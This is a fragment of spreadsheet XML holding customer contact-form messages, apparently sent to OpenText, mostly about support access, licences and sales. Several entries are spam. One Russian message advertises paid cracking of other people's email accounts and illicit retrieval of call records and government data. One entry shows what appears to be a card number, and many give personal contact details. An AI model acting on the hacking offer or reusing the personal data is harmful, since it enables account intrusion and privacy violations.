    <t xml:space="preserve">My name is Joshua Pryce, i believe you can benefit as a business by being a faithful tither. God promises to bless those who return the 10% of what comes into their hands to him. It is a chance for you to put god to the test. If you want to talk more about it. please respond to this email my email is legendaryjosh@msn.com_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are in the process of upgrading to the eTalk/Qfinity agent in our environment. I am in the process of piloting the application install and deployment. I have built out a script for the install, so it can be deployed silently via SCCM. _x000D_
_x000D_
For the most part the install is successful and the application performs as intended. However I have ran into a couple of machines where the install hangs. I have come to find out the reason being is, due to the application attempting to install .Net 4.6.2 as required by Qfinity. The issue is not the install itself, but rather, when a machine has that specific version, an error message is generated, stating that version already installed. _x000D_
_x000D_
Since this is a silent install (silent push through SCCM), no one sees that error, so cannot click "close" to continue the install. Most of our machines are on .NET 4.6.2 or higher as is, so no need to have this part be included as part of the install. _x000D_
_x000D_
I have read through the documentation and I do not see a flag that can be used to disable this part of the install. Is there any flags or parameters in the Qfinity setup that can be used to disable this check and install of the .NET client? _x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>I have set up website registration and now trying to set up "My Support" so I can register my serial numbers and product download. Every time I go to "mu support" it states I need a confirmation email. I do this and then it takes me back to registering an account. I cannot get past that point._x000D_
_x000D_
What do I need to do to get my account through the "my support" This link provided does not take me to a PRODUCT ACTIVATION PAGE_x000D_
_x000D_
Please provide additional instructions to proceed to register and activate account._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>i would like the email address for customer service.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I was hired as the digital asset manager at Liberty Mutual Insurance in their Boston Headquarters. I understand Liberty uses MediaBin, and I want to know who on the OpenText/MediaBin side handles our account._x000D_
_x000D_
Please let me know when you can._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Katrina</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking for information on how Suite 16 works with Office 365. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Intereso servicio fax2mail</t>
  </si>
  <si>
    <t>Lead</t>
  </si>
  <si>
    <t>Password and log in issues</t>
  </si>
  <si>
    <t>I am contacting you on behalf of Lockheed Martin in order to obtain an export classification. Would you please provide the ECCN by COB tomorrow for the following part numbers: MB-ENT-07/08 (MediaBin Asset Server Enterprise Edition) and MB-ENT-07/08-MAINT (MediaBin Asset Server Enterprise Edition - Maintenance)</t>
  </si>
  <si>
    <t xml:space="preserve">Want to get in touch with a sales contact to discuss demo and features of the Cloud Faxing product. We were in contact with Crystal Schultze but her region changed and we were speaking with Danja Munley. I've tried to reach out to her with no response. Hoping our contact information is correct. </t>
  </si>
  <si>
    <t>When signing up I forgot to enter the promotion code: BBYSIS - which will bypass any fees.  We have not been set up yet can someone please make the update for me?</t>
  </si>
  <si>
    <t>Hi Opentext._x000D_
We need a simple help from you._x000D_
Our company as made the rollup of the windows 8 to windows 10 and at the new machines we cannot see the network drives from the browse menu to define the where the scan put the files._x000D_
At windows 8 we can install the enterprise scan and define the folder to the networl, but at Windows 10 we just see the use folders and the logical drive._x000D_
_x000D_
Can you help us to bypass this problem pls?_x000D_
_x000D_
Kiind regards;_x000D_
_x000D_
Bruno</t>
  </si>
  <si>
    <t>We are attempting to upgrade the computers at the VA hospital in Las Vegas with an updated RightFax client. We need assistance with the proper removal of the previous version as both are being reported as installed.</t>
  </si>
  <si>
    <t>Looking for our primary Sales rep contact for American Family Insurance in Madison, WI.  Thanks</t>
  </si>
  <si>
    <t>I need access to view the documentation(past versions and release notes) for BI Query Business Intelligence.</t>
  </si>
  <si>
    <t>Can you possibly send me the link for Captiva_REST_Services_2.5_Development_Guide.pdf</t>
  </si>
  <si>
    <t>I need to migrate a license key of Brava to a new computer..._x000D_
Brava Desktop 7.2 version_x000D_
Can You send me the link to make this change?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello - I am writing to get information on our Global 360 licenses. I contacted a rep yesterday and was told that our license has expired and we no longer have maintenance and support. In addition, we are running a very old version of Global 360. We would like information on upgrades, security and new features. </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We used to receive emailed excel reports of our department faxes.  How can we go about setting this up again?  Is there a sample we can review before fully rolling out?  Thank you.</t>
  </si>
  <si>
    <t>I am having trouble with ingestion. There seems to be a disconnect from the Qfiniti server to the converted wav files.</t>
  </si>
  <si>
    <t>I am looking for legacy software to be downloaded. Righfax 8.5 fax board installation. Is this available?</t>
  </si>
  <si>
    <t>Are you really sure people with decent background will keep struggling uploading application for a job? If your recruiting system is such badly malfunctioning because in your management people were too lazy to pay attention to the minimums then what should we, decent applicants expect from you as employer??? Sorry guys, I won't recommend you in any forms, especially not in the business...</t>
  </si>
  <si>
    <t xml:space="preserve">I have bee recently added to have eFax.  I was looking on the apple store to see if you have an app.  Thanks_x000D_
</t>
  </si>
  <si>
    <t>We are in the process of engaging BIRT to our organisation. Kindly notify us the cost of support annually.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Je souhaite accéder à MySupport sur le portail OPenText pour télécharger le package OpenText VIM mais il semble que je ne dispose pas des autorisations nécessaires._x000D_
_x000D_
Cordialement,</t>
  </si>
  <si>
    <t>I'm STILL waiting on a quote to renew a license for EnCase Forensic. Dongle ID# G3002088531.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
we have purchase 1772-DX-P-N/Brava! Desktop 7.2 Network - 2D AutoCAD Limited _x000D_
Brava DTX 10 Seats 10 seats   back in 2015 for our customer. License key file was generated back then for a server where license manager is running. Application version is Brava! Desktop DX-P 7.2.0. We need to migrate license manager to new server and new licence key file is needed. Which steps do I need to take to perform this action?_x000D_
_x000D_
Following software ID and PIN was provided to us in 2015:_x000D_
        Software ID: a036000000km2bJ_x000D_
        Software PIN: 403071_x000D_
        _x000D_
        Email: _x000D_
        Related license information:_x000D_
        Account: Synergon A.s._x000D_
        Usage: (not specified)_x000D_
        Seat(s): 10_x000D_
_x000D_
_x000D_
Thanks in advance for the answer_x000D_
</t>
  </si>
  <si>
    <t>I would like to talk with someone about an demo for the ECM tool._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>LC</t>
  </si>
  <si>
    <t>NU</t>
  </si>
  <si>
    <t>Oкажу помощь в подборе пaроля к чужому почтовомy аккаунту _x000D_
Время исполнения: от 3x часов до 5 дней _x000D_
 _x000D_
Пaрoль НЕ изменяется, т.е. остаётся тем же, что использует владелец ящика. _x000D_
Предоплату НЕ беру, оплата производится только по факту выполнения работы. _x000D_
 _x000D_
Доказательства выполнения работы: Фото почты ( писем ) / читаю и цитирую вам ваше письмо посланное на почту. _x000D_
Расценки Мaил/лиcт/бк/инбoкс: 5000 рублей/ Яндекс 15 000р. Ukr 20 000р. Рамблер 15 000р. Гмаил 25 000р  + Корпоративные. _x000D_
 _x000D_
Так же пробив данных/детализация звонков/доступ в личный кабинет  "билайн" "мтс" "ТЕЛЕ2" "Мегафон" _x000D_
Пробив данных с гибдд, фмс, загс, банки. _x000D_
Для связи писать только на:  uslugiopen4 @ gmail. com  ( пробелы стереть )</t>
  </si>
  <si>
    <t xml:space="preserve">CB is commencing a Document Management sourcing activity and would like to discuss the inclusion of Opentext. Please could someone in Sales give me a call to discuss? </t>
  </si>
  <si>
    <t>Interesse an ECM Lösung und automatisierte Eingangsrechnungsverarbeitung</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
auf der DOMEA-Partner-Seite haben sich ni die Bezeichnung unseres Unternehmens zwei Fehler eingeschlichen._x000D_
Richtig muss es lauten: "Materna Information &amp; Communications SE"._x000D_
Können Sie dies bitte zeitnah aktualisieren?_x000D_
_x000D_
Vielen Dank vorab und beste Grüße_x000D_
Frank Schwammbach</t>
  </si>
  <si>
    <t>We need to get the Software Assigned to name details corrected, please let me know the required steps.</t>
  </si>
  <si>
    <t xml:space="preserve">Require pricing for a tender, unable to get through the channel. </t>
  </si>
  <si>
    <t xml:space="preserve">I want to became a reseller partner._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good day_x000D_
_x000D_
I am looking to evaluate OpenText against SaaS offerings_x000D_
_x000D_
I would like an indicative price only - a quote is not necessary at this time_x000D_
_x000D_
Key facts:_x000D_
_x000D_
Production/Live_x000D_
4000 registered users_x000D_
Hosted upon 8 production servers_x000D_
_x000D_
Test/UAT instances_x000D_
300 test users_x000D_
Hosted upon 4 servers_x000D_
_x000D_
Development_x000D_
20 developers/form designers_x000D_
_x000D_
Since I'm evaluating against SaaS, I do need to get a full TCO, hence can you provide at least the following:_x000D_
- What is the licensing basis - per user or per server?_x000D_
- Active users or all registered users?_x000D_
- License costs for production/live - per month/year/whatever_x000D_
- License costs test/UAT - per month/year/whatever_x000D_
- License costs for development/form designer tooling - per month/year/whatever_x000D_
- Support costs for production and the support model offered - hours/SLA Any other costs such as subscriptions for upgrades etc_x000D_
_x000D_
Thank you,_x000D_
_x000D_
   Simon_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello ,_x000D_
_x000D_
this is nuket. we are subcontracter for shopdirect company for leather belt. we can not login the GXS system for upload shipped goods documents ._x000D_
cos stytem is blockage  with our user name. _x000D_
waiting for youre kindly reply how to solve this issue. _x000D_
br ._x000D_
nüket bengi .</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
We are in the process of evaluating various Document Management Systems for one of our clients. The client is looking for Document Management as a Service (DMaaS). We would like to understand the OpenText offerings in this space. It would be helpful to see an OpenText demonstration. _x000D_
_x000D_
Looking forward to speak to one of your Sales executives. _x000D_
_x000D_
Thanks &amp; Regards,_x000D_
Prasad Birje </t>
  </si>
  <si>
    <t>We want to use Open text as our third party EDI provider for Von Maur. Could you please guide us in details.</t>
  </si>
  <si>
    <t>Dear Sir and Madam,_x000D_
we got the invoice 9000965704 from your company. My problem is that your company is an new supplier for us. I have to create a new account in our ERP system but I need an company adress from you. _x000D_
On the invoice I find only the adress from JPMorgan Chase Bank._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>I'm not able to access My support but I'm able to Log in._x000D_
Each time I'm trying to access My support link, I getting back to a page saying No Access and offering me to request confirmation email._x000D_
But confirming the registration doesn't change anything I keep going back to the page saying No access._x000D_
Can you please have a look?</t>
  </si>
  <si>
    <t>I requested for access to support. I got the confirmation email , I clicked on confirmation email and signed in but still every time I access support site it says not confirmed. Please help</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
utilisateur de Hummingbird BI query V8.1 Admin depuis des années, je souhaite avoir des information sur la dernière version de votre produit ainsi que le prix de licences._x000D_
Cdlt,_x000D_
Thierry lecoq</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is Kasper Karlsson and I am a security researcher. I would like to report a security vulnerability in one of your corporate websites, in accordance with the instructions on your Security Acknowledgements page._x000D_
_x000D_
The instructions refer to this contact form, but apparently it does not allow messages containing URLs. I simply get an error message stating "Reason for Contact: Value must not contain any URL's"._x000D_
_x000D_
Is there any alternate way of reporting vulnerabilities (e.g. via email), which allows me to include the URL of the vulnerable endpoint?_x000D_
_x000D_
Thank you in advance for your attention to this matter._x000D_
_x000D_
Best regards_x000D_
Kasper Karlsson</t>
  </si>
  <si>
    <t>Subject: Scaling your company: Can you survive without it?_x000D_
_x000D_
Hi_x000D_
_x000D_
ATT: Tech Decision Makers_x000D_
_x000D_
I had a look at your company profile on LinkedIn...your business definitely has potential to scale and take on many new clients, but as you may know, even multi-billion dollar companies have been disrupted and shut down completely by not planning ahead. Think Nokia - they are no longer "Connecting People". _x000D_
_x000D_
Organizations looking not only to grow but survive in a market where everyone is getting disrupted have to read this. If you're the right person to speak with, then great! If not, I'd love it if you could forward this information to all technology and software development related decision makers and managers. The reason being..._x000D_
_x000D_
Many leaders and decision makers are losing the ability to think creatively because outdated processes have deemed it unnecessary. Doing something new seems almost impossible as they don’t know where to start._x000D_
_x000D_
The reality is that many organizations that don’t adapt or have been attempting an Agile transformation for many years, aren’t prepared for when they need to SCALE (take on the world). SCALED AGILE TRANSFORMATION...sounds like a big undertaking, and expensive. It doesn’t have to be either.  _x000D_
_x000D_
_x000D_
These are the benefits that businesses have seen through the implementation of Scaled Agile (SAFe):_x000D_
_x000D_
1.	Lead time dropped from 12 months to 3-4 months_x000D_
2.	Time to market reduced from 700 days to 30 days_x000D_
3.	Business outcome raised by 400% with only 20% increase in team size_x000D_
4.	Cost decreased by 77%_x000D_
5.	90% greater collaboration amongst teams_x000D_
6.	Delivers on commitments 100% of the time_x000D_
7.	Higher code quality and more frequent releasesEnhanced alignment between business and IT_x000D_
8.	_x000D_
_x000D_
*Source - Scaled Agile Framework Case Studies_x000D_
_x000D_
ATC is SAFe certified. We come with over 10 years of experience enabling growth within organizations by providing them with access to a market of skills, business/vendor partnerships and growth through Ma</t>
  </si>
  <si>
    <t>I would like to have access to all the OpenText VIM documentation</t>
  </si>
  <si>
    <t xml:space="preserve">We have an urgent training requirements on OpenText Training._x000D_
_x000D_
Please find below course content we are looking for –_x000D_
_x000D_
_x000D_
Super Users / Business Analysts _x000D_
•	2-0106 Content Server Information Administration _x000D_
•	2-0114 Forms Design v16.2 - New!   _x000D_
•	1-1700 Using Brava_x000D_
•	3-0117 WebReports Design I v16 _x000D_
•	2-0113 Workflow Design  _x000D_
Administrators  _x000D_
•	3-2202 OpenText Capture Center (OCC)_x000D_
Developers  _x000D_
•	4-0143 Customizing the User Interface _x000D_
•	4-0140 Content Server IDE (CSIDE) Fundamentals_x000D_
•	4-0144 REST API and Content Web Service Fundamentals v16 _x000D_
•	4-0144 Web Services Fundamentals_x000D_
•	4-0145 Upgrading Customizations to OpenText Content Server v10_x000D_
•	4-0175 Content Server v10.5 OScript Development using Eclipse_x000D_
Custom topics as per our requirement - _x000D_
•	Open Text - Content Server, Security Set up, OCC Customization tool, OCC Client and OCC Validation tool._x000D_
•	Open Text - Live Report (Create/Update complex reports)_x000D_
•	Approval workflow (Honda has a on going project on “P2P Ariba Cloud implementation”, Some part of it may be moved to be implemented in OpenText and OCC – as of now we don’t have much clarity on it)_x000D_
•	Web Report - ( A third party tool - replacement for Content Access of Open Text)_x000D_
•	Integration of Open Text and Web Report_x000D_
•	Brava viewer (Report viewer)_x000D_
•	Brava Advance ( ability of annotation)_x000D_
•	Open Text integration with PeopleSoft if possible basics only._x000D_
</t>
  </si>
  <si>
    <t>Dear Partner,_x000D_
We are resseler in France and I would like to know if you can a provide a quote for OpenText Exceed</t>
  </si>
  <si>
    <t xml:space="preserve">Please share Documentum Developer studio link(url).Thanks _x000D_
</t>
  </si>
  <si>
    <t>Borrow up to $1000_x000D_
5165110150421086_x000D_
06/21</t>
  </si>
  <si>
    <t xml:space="preserve">i have initiative CMS, we have multi touch point (app, web portal, chat bot, etc), we need to centralize CMS platform solution. have you any solution for us? </t>
  </si>
  <si>
    <t>we are a 32-person non-profit law shop, looking for an effective document management system to complement our newly-launched case management system.  Please advise what cost range(s) there are.</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to set up the First Class Go app for Android so I can connect to our FC server from my android phone.  When I download the app there is no way easily visible to set the server settings to connect.  What gives?  The app also has horrendous ratings on Google Play.  Is this the right app to connect to my firstclass server? </t>
  </si>
  <si>
    <t xml:space="preserve">I have been trying to login to the website for quite a while to download files I need to update our Exchange server.  I keep getting the NO ACCESS error.  I know that we should have an open contract with your company.  SUID on our server is 26410-12180. I need verification on the account so support access will be granted and I can download the software. </t>
  </si>
  <si>
    <t>I am looking for a solution that helps communicate with customers more efficiently. Our customer communications will be a mix of transaction based messaging and marketing communication. I am interested in the capabilities of the Open Text Exstream solution.</t>
  </si>
  <si>
    <t>Please give access to the Knowledge Center to KayAnn Capener - kayann.capener@jt4llc.com  _x000D_
_x000D_
Thanks, Linda</t>
  </si>
  <si>
    <t>I need access to OpenText Exceed Updates 15.x  I don't currently have a "Support" account but am interested in getting one if required._x000D_
_x000D_
Please assist?</t>
  </si>
  <si>
    <t xml:space="preserve">My account shows to no longer being available. I am unable to even reset my password because of this. </t>
  </si>
  <si>
    <t>Enquiring to what type of licence is available for OpenText Exceed and the indicative costs associated with them._x000D_
_x000D_
Rgds</t>
  </si>
  <si>
    <t xml:space="preserve">I was denied access when trying to open a support account.  Taylor has a customer support contract so I tried to gain access to these resources.  Our end user number is 10423904.  One of our contact people, Chris Falsone just opened a ticket about this.  I would just like help getting access to your Exstream resources._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">UPS indicates that they use ansi code x12 210 5010_x000D_
_x000D_
When creating a 210 incoming document that was not available._x000D_
I used x12-004010. _x000D_
_x000D_
Is there a way for me to use their code or do they have to change their code?_x000D_
</t>
  </si>
  <si>
    <t>We are looking to get current with our existing rightfax deployment, and possibly look into licencing for integrating rightfax with some of our MFPs.</t>
  </si>
  <si>
    <t>Could you please send me a list of all the Encase dongles we own and the expiration date on each.  Thank you.</t>
  </si>
  <si>
    <t>je úžasný _x000D_
Eхⱪlꭒȥiⅴní Ⅴaḷеntýṇsк̱é aкcе _x000D_
̱Ṣpоḷečṇĕ s ṇašіmі рaṛtṇerу jsме si pro ṿảs přiрravіlі nĕⱪoliк еxⱪḷꭒȥіⅴṇích ṿaḷenṭýnskýcḥ aкcí, díⱪу ⱪterýм ꭒšеtříṭe. _x000D_
Všechṇу ṇejlеpsí рroрạ̣̱ꬶaĉṇí ⱪóɗу a naᶀíɗку pṛo ṇáкꭒp ɗárкů a pořảdảní ṛoмaṇtіcке dоⅴolené v čеṣкem ṣе̣̣̱ꬶᶆeṇṭꭒ internеtս:</t>
  </si>
  <si>
    <t>Re: Account number 853315, Invoice number 1811853315 - would like to confirm that this invoice was paid?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
I am looking for a Content sales person to reach out to a customer.  _x000D_
Would you be able to point me in the right direction?_x000D_
_x000D_
My team supports Raytheon’s Collab software on a 3rd party cloud &amp; they are happy with us. _x000D_
_x000D_
A little earlier today our contact Sammy Li mentioned they were starting the process to look for a Collab replacement and are interested in the OT offerings. _x000D_
I suspect a small scale Content Server may suit their needs. _x000D_
_x000D_
Sammy Li_x000D_
Pension Investment Operations _x000D_
Analyst_x000D_
Raytheon Company_x000D_
870 Winter Street_x000D_
Waltham, MA 02451-1449_x000D_
_x000D_
Phone: 781-522-5841_x000D_
Fax: 781-522-5830_x000D_
Email: Sammy.li@raytheon.com_x000D_
_x000D_
Notes: 2/21_x000D_
_x000D_
What Collab features do you use most?_x000D_
•	Rely on it as document storage_x000D_
•	Likes the customizability_x000D_
•	Like the email feature_x000D_
•	Like the folder structure they have_x000D_
•	Want more functionality (notification by emails, better reporting tool)_x000D_
•	Like how Intuitive it is_x000D_
•	Team: Investment and Operations due diligence focus_x000D_
_x000D_
Thanks!_x000D_
_x000D_
Maike. </t>
  </si>
  <si>
    <t>I need to update the MAC address associated with my license. I recently got a new laptop and downloaded the software, but receive an 'invalid license' error when I try to open files with Brava! Desktop DX-P</t>
  </si>
  <si>
    <t>Metro Medical in Nashville TN is moving operations to corporate headquarters at Cardinal Health in Dublin, OH.  We need pricing to install a production and test environment on two separate partitions of an IBM iSeries there.  The system will be a 9119/MME-EPBA with a P30 processor group.</t>
  </si>
  <si>
    <t>We're currently looking at different contract management solutions, we'd like to view a demo and see what your company has to offer. _x000D_
_x000D_
Best,_x000D_
_x000D_
Paulo Sosa</t>
  </si>
  <si>
    <t>Need to find out if Documentum is "compatible" with Secudes "Halocore" solution, could you please have someone get in touch for a "technical" discussion.</t>
  </si>
  <si>
    <t xml:space="preserve">Can I get the hours actual hours that the trainings will be going on for the EDAX150 - Axcelerate Data Processing Specialist Certification, EDAX200 - Axcelerate Review and Analysis - Advanced Certification and EDAX150 - Axcelerate Data Processing Specialist Certification. </t>
  </si>
  <si>
    <t>I would like more information regarding an older platform "OpenText Exceed".  This information will allow us to continue using your products.</t>
  </si>
  <si>
    <t>What is the difference between OpenText Regulated Documents and OpenText Documentum for R&amp;D?_x000D_
_x000D_
Where can I find more information about training or webinars related to your OpenText Life Sciences products?</t>
  </si>
  <si>
    <t>Good day..._x000D_
We are having troubles logging in to the partner portal.  We may need to do a reset.  Please let me know._x000D_
Thank you _x000D_
Leslie Rowe</t>
  </si>
  <si>
    <t>I need an accounts receivable email contact in order to check some information regarding invoices your company send. Thank you in advance.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
I have some question about your product,_x000D_
1.	I want to know if your product are compatible with mitel?_x000D_
2.	We use sip trunk, and I want to know if Compatible with Bell sip provider?_x000D_
3.	Are you able to use DID to redirect fax to a share mailbox? _x000D_
4.	What is the maximum of line are supported by you product, presently, we have around 45 fax did number via SIP Trunk/phone system Mitel_x000D_
5.	I’t possible to fax via a pc and the multi-Function? How it’s work from the MFC?_x000D_
6.	What is the price$$ for these products?_x000D_
7.	Do you have a demo to try your product?_x000D_
_x000D_
Resume of my environment:_x000D_
Mitel Phone system_x000D_
Mitel mbg_x000D_
Exchange 2013_x000D_
VMware 6.0_x000D_
Sip Trunk_x000D_
+-200 users_x000D_
Citrix _x000D_
_x000D_
Thanks you for your answer_x000D_
</t>
  </si>
  <si>
    <t>I want to end my subscription with Hightail, if I actually have one.  I am not sure of my status, but if I have a subscription, please regard this as my written request to end it immediately.  Please confirm that you have received this request, will end my subscription, and will cease any access to my computer, or any of my online electronic communications. _x000D_
_x000D_
Thank you,_x000D_
KBKlein</t>
  </si>
  <si>
    <t>Need to download the latest version of RightFax server for one of our customers to upgrade their system. Our end customer is Embrace Home Loans.</t>
  </si>
  <si>
    <t>Hi there,_x000D_
I was wondering if you have brochures anywhere? Im trying to put together a few options for my boss. Thank you!</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
Could you please clarify me if the Opentext Media Management 16.5 is supported with Azure SQL database?_x000D_
_x000D_
Best Regards,_x000D_
Nelson Sereno</t>
  </si>
  <si>
    <t>Good morning,_x000D_
I am trying to access the Open Text My Support feature but keep getting a message that says "No Access. We're sorry, your account does not grant you access to this resource." I have verified my account and have followed the "Request Confirmation Email" link but have not been contacted. Can access to My Support be granted to my account?_x000D_
Jeremy</t>
  </si>
  <si>
    <t>I need to have a conversation due our company wants to explore the option to replace our actual EDI provider.</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
_x000D_
We have received your invoice 07640591809 however we are unable to pay due to the bank details on the invoice not matching what we have on the system._x000D_
_x000D_
I believe what is on the invoice are the old bank details._x000D_
_x000D_
Are you able to confirm if we are able to continue payment with the new bank details._x000D_
_x000D_
Many thanks_x000D_
Lisa</t>
  </si>
  <si>
    <t>I need to download Enterprise Connect 105.2 for Army customer please provide site/access to download this approved software.</t>
  </si>
  <si>
    <t>My profile is show my name and phone number as John Schweizer.I have tried to edit the information in Profile but it will not change. My name is Keli Scherer and my phone number is 404-754-5305.</t>
  </si>
  <si>
    <t xml:space="preserve">Contact_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested in getting an evaluation version of the OpenText Vendor Invoice Management solution for S/4HANA.  Is such an offering available and what is the licensing cost, if any?  </t>
  </si>
  <si>
    <t>I'm interested in learning more about your CCM capabilities as we're looking for a tool that helps us with our report distribution capabilities to clients. we are a documentum user already as well as salesforce, and would be interested in your solutions that tie these two systems together with a distribution process. _x000D_
Thanks,_x000D_
Jo-Ann</t>
  </si>
  <si>
    <t>Hi - I am working with a current Teleform customer for an assessment. I have some questions around licensing and the ability to be able to audit and track activity withing the platform. currently, hard deletes are not traceable in the reader/verifier. This is causing some documentation to go 'missing'. I am trying to understand what can be changed or where they need to go to gain transparency into this issue.</t>
  </si>
  <si>
    <t xml:space="preserve">I wanted to reach out as I oversee 178+ hotels nationwide on behalf of my Management Company Island Hospitality. I noticed that we have various hotels that match up with your US Office locations. I would love to see if I can discuss negotiated discounts on behalf of the portfolio with the Travel Manager for OpenText. </t>
  </si>
  <si>
    <t>I am trying to find out who our account rep is for our account (855568). I would like to get a copy of our agreement.</t>
  </si>
  <si>
    <t>The company I work for use xPression 4.6.  At present all users work on Internet Explorer 11 but the company is looking at moving onto Chrome.  Is xPression 4.6 fully compatible with Chrome?</t>
  </si>
  <si>
    <t>I am needing to renew my Encase Software license. Could please advise on whom I need to contact  to accomplish this. I have renewed it in the past through Guidance Software but was unable to this year as I was redirected to your site.</t>
  </si>
  <si>
    <t xml:space="preserve">Liebes OpenText-Team, _x000D_
wir liefern wöchentlich Getränke in München aus und als wir heute wieder bei Euch vorbei gefahren sind, haben wir uns gefragt, wie es denn so um Eure Getränkelieferung steht. Können wir Euch mit Getränke versorgen?_x000D_
Als Getränkefachgroßhändler führen über 2500 Getränke in unserem Sortiment und beliefern Euch ab 25Euro Bestellwert kostenlos.  _x000D_
Gerne erstelle ich Ihnen für Sie ein individuelles und selbstverständlich unverbindliches Angebot._x000D_
Mein Name ist Stefanie Zotz und Sie erreichen mich jederzeit unter der Telefonnummer: 08093 / 90 80 80 oder per Mail: lieferservice@anderl-getraenke.de_x000D_
Wir würden uns sehr freuen, wenn wir Ihr Vertrauen bekommen und gemeinsame eine partnerschaftliche Zusammenarbeit auf die Beine stellen könnten._x000D_
Herzliche Grüße_x000D_
_x000D_
Stefanie Zotz_x000D_
Leitung Lieferservice_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We currently use OpenText StreamServe 5.6.2 on our factories._x000D_
I request to get the access to the support pages : documentations and hotfix (download)._x000D_
_x000D_
Please could you ask me how to proceed ?_x000D_
Thank you._x000D_
_x000D_
Best regards</t>
  </si>
  <si>
    <t>Email archiving for O365</t>
  </si>
  <si>
    <t>I am using your product of Exceed onDemand (EoD) for highly regulated patient-level clinical data. Cyber security is nowadays one of the top issue across all area and industries world-wide and especially important for the industry I am working. World-widely, there are more and more regulations and legal setup regarding cyber and data security every year. I would like to know which cryptographic protocol is EoD using and how secure it is compared to other approach such as SSH? Could you provide me detailed technical review and evaluation of your network service in terms of cyber and data security? Thank you very much.</t>
  </si>
  <si>
    <t>I want know which network protocol you are using underling your network service. How secure your network service is compared to other approach such as SSH? Could you provide me some detailed comparisons about the technical aspects regarding security? If possible, could you also provide me a list of articles for technical review of your network service in terms of internet and data security? Thank you very much.</t>
  </si>
  <si>
    <t>I want to register for the following course but I get the site web server error</t>
  </si>
  <si>
    <t>_x000D_
I need a system of management and document administrator for various maintenance and engineering files. It is necessary to incorporate to have a better access and update of the information, which is friendly with the user.</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
My name is Rosemary Morris and I work in the Search Engine Optimization Company Based in India and USA_x000D_
_x000D_
Are you looking for SEO service to rank your Website organically in Top 3 positions of Google 1st page?_x000D_
_x000D_
We provide a guarantee to rank your website on the top page of Google through our SEO campaign. We have a very skilled and committed SEO team, which strictly follow each and every guideline of Google. _x000D_
_x000D_
You can see pretty good improvement of your website ranking within a month. There will be no setup fee or any other hidden charge, So you just have to pay your monthly SEO fee._x000D_
_x000D_
Please revert back if you are interested in the campaign. We will further provide you complete details about our Affordable SEO Packages &amp; Pricing._x000D_
_x000D_
Warm Regards,_x000D_
Rosemary Morris</t>
  </si>
  <si>
    <t>We want to know how we can receive support for Open Text Streamserve in case we have any query or issues related._x000D_
_x000D_
Previously we used to access streamshare blogs for support. Since now this is not possible, grateful to advise us on other alternatives for same._x000D_
_x000D_
Regards,_x000D_
Rishi</t>
  </si>
  <si>
    <t>I am a contractor, working for Chevron. Can i get full Support access</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir,_x000D_
    _x000D_
ACL-Apollo Computing Laboratories (P) Ltd., established in 1992 at Hyderabad, India is a leader in Manufacturing of Strategic Electronic Systems in the domain of embedded computing for the Programmes of National importance such as Missile Programmes, Light Combat Aircraft (LCA), Torpedoes, space &amp; Remote Sensing._x000D_
 _x000D_
We request you to consider us as your authorised Distributer/Dealer for your Forensic Intelligence products for the entire territory of Republic India._x000D_
_x000D_
We can Set-Up Forensic Lab and invite Crime Investigation Officers to showcase the Forensic Intelligence Products._x000D_
 _x000D_
We can Set-Up Training Centre to provide continuous support to Crime Investigation Officers that helps to grow business in India._x000D_
 _x000D_
 _x000D_
Please find the following details of our organisation enclosed for your kind perusal:_x000D_
 _x000D_
            1.   Organisation Profile_x000D_
            2.   The infrastructure available at_x000D_
                  -   Hyderabad Headquarters and Manufacturing Infrastructure_x000D_
                  -   Bengaluru Customer SupportCentre_x000D_
_x000D_
Please visit our website for more detials._x000D_
_x000D_
 _x000D_
We look forward to partner with you as authorised dealer for your Forensic Intelligence Products._x000D_
_x000D_
Best Regards_x000D_
_x000D_
Sowjanya.K_x000D_
Manager - Rugged Systems_x000D_
Apollo Computing Laboratories (P) Ltd._x000D_
A-11, Electronic Complex,_x000D_
Kushaiguda, ECIL POST,_x000D_
Hyderabad - 500 062, India._x000D_
Phone: +91-40-27141522 / 27141533_x000D_
Fax: +91-40-27141554_x000D_
mobile: 917680943325_x000D_
Email: sowjanya@apollocomputing.com, jv@apollocomputing.com_x000D_
</t>
  </si>
  <si>
    <t>I would like to download Tableau Firmware Update (TFU). The process stocks after filling out my email address.  Please instruct me how to gain access to the software.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am part of a partner company and I would like to have access to support and knowledge base._x000D_
Best Regards_x000D_
Audrey BITUR</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are providing very cost effective and quality pact google ranking &amp; website development services._x000D_
_x000D_
Google Ranking @ $99/ Month_x000D_
_x000D_
Website Design &amp; Development Starting @ $299_x000D_
_x000D_
If interested, please respond with your requirement, so that I _x000D_
_x000D_
can send detailed proposal._x000D_
_x000D_
_x000D_
Thanks &amp; Regards_x000D_
Russ  | Whatsapp: +91 9212464161</t>
  </si>
  <si>
